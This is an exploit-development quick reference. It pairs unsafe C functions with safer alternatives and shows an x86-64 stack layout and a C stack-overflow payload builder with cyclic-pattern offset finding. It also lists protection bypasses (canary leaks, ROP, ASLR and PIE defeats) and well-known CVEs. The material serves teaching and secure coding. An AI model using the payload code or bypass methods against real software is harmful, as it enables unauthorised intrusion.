Exploit Foundations
Quick Reference
Vulnerable C Functions and Safe Alternatives
| Vulnerable | Problem | Safer Alternative | Caveat |
|---|---|---|---|
| gets(buf) | No length limit at all (removed from the C standard in C11) | fgets(buf, sizeof buf, stdin) | Keeps the trailing newline if it fits; strip it if needed |
| strcpy(dst, src) | Copies until the NUL, no size check | strncpy(dst, src, n) | Does NOT NUL-terminate when strlen(src) >= n; set dst[n-1] = '\0' afterwards, or use snprintf(dst, n, "%s", src) |
| sprintf(buf, fmt, ...) | No output size limit | snprintf(buf, sizeof buf, fmt, ...) | Return value is the length it wanted to write; a value >= size means the output was truncated |
| scanf("%s", buf) | Reads until whitespace, no limit | scanf("%63s", buf) (width specifier) | Width must be one less than the buffer size (63 for a 64-byte buffer) to leave room for the NUL |
| strcat(dst, src) | Appends with no size check | strncat(dst, src, n) | n is the remaining free space minus one, not sizeof dst; it always appends a NUL, so room must be left for it |
x86-64 Stack Layout (stack grows toward lower addresses)
Higher addresses
+----------------------------+
| caller's stack frame       |
+----------------------------+
| return address      [8 B]  | <- overwrite target
+----------------------------+
| saved RBP           [8 B]  | <- frame pointer
+----------------------------+
| (stack canary       [8 B]) | <- only when built with -fstack-protector; sits between the locals and saved RBP
+----------------------------+
| local variables            | <- buf lives here
| char buf[32]        [32 B] | <- overflow starts here and writes toward higher addresses
+----------------------------+
Lower addresses (stack grows down)
Offset from buf to the return address (no canary, buf directly below the saved RBP):
32 (buffer) + 8 (saved RBP) = 40 bytes
The compiler may place other locals or alignment padding between buf and the saved RBP, so confirm the offset in a debugger (for example by sending a cyclic pattern and reading the crashing RIP) rather than assuming it from the declared size.
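As an added example (not part of the original page), the following C code turns the offset arithmetic above into a payload builder and adds the cyclic-pattern check used to confirm the offset. The 32-byte buffer, the target address 0x401136 and the idea of a win() function to return into are assumptions for illustration, not values from any real binary; the 40-byte offset only holds for a binary built without a canary (-fno-stack-protector) where the compiler put nothing between buf and the saved RBP.

```c
/* Added example: "padding + fake saved RBP + return address" payload for
 * the layout above, plus a Metasploit-style cyclic pattern to find the
 * real offset from a crash. All sizes/addresses are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_PATTERN 20280   /* one full period of the Aa0Aa1... pattern */

/* Offset from the start of buf to the return address in the diagram:
 * the buffer plus the 8-byte saved RBP. Assumes no canary and no padding. */
size_t ret_offset(size_t buf_size)
{
    return buf_size + 8;
}

/* x86-64 is little-endian, so the address is stored low byte first. */
static void put_le64(unsigned char *p, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        p[i] = (unsigned char)(v >> (8 * i));
}

/* Fill out[] with buf_size bytes of 'A', 8 bytes of fake saved RBP, then
 * ret_addr. Returns the payload length, or 0 if out is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t buf_size, uint64_t ret_addr)
{
    size_t total = ret_offset(buf_size) + 8;
    if (cap < total)
        return 0;
    memset(out, 'A', buf_size);
    put_le64(out + buf_size, 0x4242424242424242ULL); /* saved RBP: any value */
    put_le64(out + ret_offset(buf_size), ret_addr);
    return total;
}

/* Cyclic pattern "Aa0Aa1Aa2...": byte windows are unique within one
 * period, so the value that lands in RIP identifies its own offset. */
size_t cyclic_pattern(char *out, size_t n)
{
    size_t k = 0;
    for (char u = 'A'; u <= 'Z' && k < n; u++)
        for (char l = 'a'; l <= 'z' && k < n; l++)
            for (char d = '0'; d <= '9' && k < n; d++) {
                char trip[3] = { u, l, d };
                for (int i = 0; i < 3 && k < n; i++)
                    out[k++] = trip[i];
            }
    return k;
}

/* Given the RIP value seen at the crash (e.g. from gdb) after sending a
 * pattern of pattern_len bytes, return the offset of those 8 bytes in
 * the pattern, or -1 if they are not found. */
long cyclic_find(uint64_t rip_value, size_t pattern_len)
{
    char pat[MAX_PATTERN];
    unsigned char needle[8];
    if (pattern_len > sizeof pat)
        pattern_len = sizeof pat;
    size_t n = cyclic_pattern(pat, pattern_len);
    put_le64(needle, rip_value);
    for (size_t i = 0; i + 8 <= n; i++)
        if (memcmp(pat + i, needle, 8) == 0)
            return (long)i;
    return -1;
}

int main(void)
{
    unsigned char payload[64];
    /* 0x401136 stands in for the address of a hypothetical win() function. */
    size_t n = build_payload(payload, sizeof payload, 32, 0x401136ULL);

    printf("offset to return address: %zu\n", ret_offset(32));
    printf("payload (%zu bytes):", n);
    for (size_t i = 0; i < n; i++)
        printf("%s%02x", i % 16 ? " " : "\n  ", payload[i]);
    printf("\n");

    /* Simulate the crash: the 8 bytes of the pattern at offset 40 are
     * what a 40-byte-offset overflow would leave in RIP (host is x86-64). */
    char pat[200];
    uint64_t fake_rip;
    cyclic_pattern(pat, sizeof pat);
    memcpy(&fake_rip, pat + 40, 8);
    printf("crash RIP 0x%016llx -> offset %ld\n",
           (unsigned long long)fake_rip, cyclic_find(fake_rip, sizeof pat));
    return 0;
}
```

In practice the pattern is sent instead of the 'A' padding, the faulting RIP (or the value gdb reports as the invalid return address) is fed to cyclic_find, and only then is build_payload used with the confirmed offset.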
Protection Mechanisms
| Protection | What It Blocks | Typical Bypass | Toggle (gcc/ld unless noted) |
|---|---|---|---|
| Stack Canary | Linear stack overflow reaching the saved RBP / return address (the canary is checked before return) | Leak the canary via a format string or other info leak; brute-force it byte by byte against a forking server, where the canary stays constant across children | -fstack-protector-strong / -fno-stack-protector |
| NX / DEP | Executing injected shellcode on the stack or heap | ROP (Return-Oriented Programming) or ret2libc: chain existing executable code instead of injecting it | -z noexecstack (default) / -z execstack |
| ASLR | Hardcoded library, stack and heap addresses in exploits | Info leak to discover the real base at runtime, then compute targets as base + known offset | kernel: /proc/sys/kernel/randomize_va_space (2 = full) |
| PIE | Fixed binary base address (.text, GOT, data) | Info leak of a binary address, or a partial overwrite of the low bytes of a pointer, since the base is page-aligned and the low 12 bits are unchanged | -pie (default on most distros) / -no-pie |
| RELRO (Full) | GOT overwrite attacks (GOT is mapped read-only after eager binding) | Target other writable memory: function pointers in data, heap metadata, library hooks where the libc version still has them | -z relro -z now / -z norelro |
Notable CVEs
| CVE | Name | Year | Vulnerability Class |
|---|---|---|---|
| CVE-2014-0160 | Heartbleed | 2014 | Buffer over-read (missing bounds check in the OpenSSL TLS heartbeat extension) |
| CVE-2014-6271 | Shellshock | 2014 | Code injection (Bash executed trailing commands while parsing function definitions passed in environment variables) |
| CVE-2021-44228 | Log4Shell | 2021 | Remote code execution (JNDI lookup injection via attacker-controlled log messages in Log4j 2) |
| CVE-2017-0144 | EternalBlue (MS17-010) | 2017 | Buffer overflow (Windows SMBv1); the exploit was used by WannaCry |
| CVE-2016-5195 | Dirty COW | 2016 | Race condition (Linux kernel copy-on-write handling) leading to local privilege escalation |
| CVE-2024-3094 | XZ Backdoor | 2024 | Supply chain (malicious code inserted into xz-utils 5.6.0 and 5.6.1, targeting sshd through liblzma) |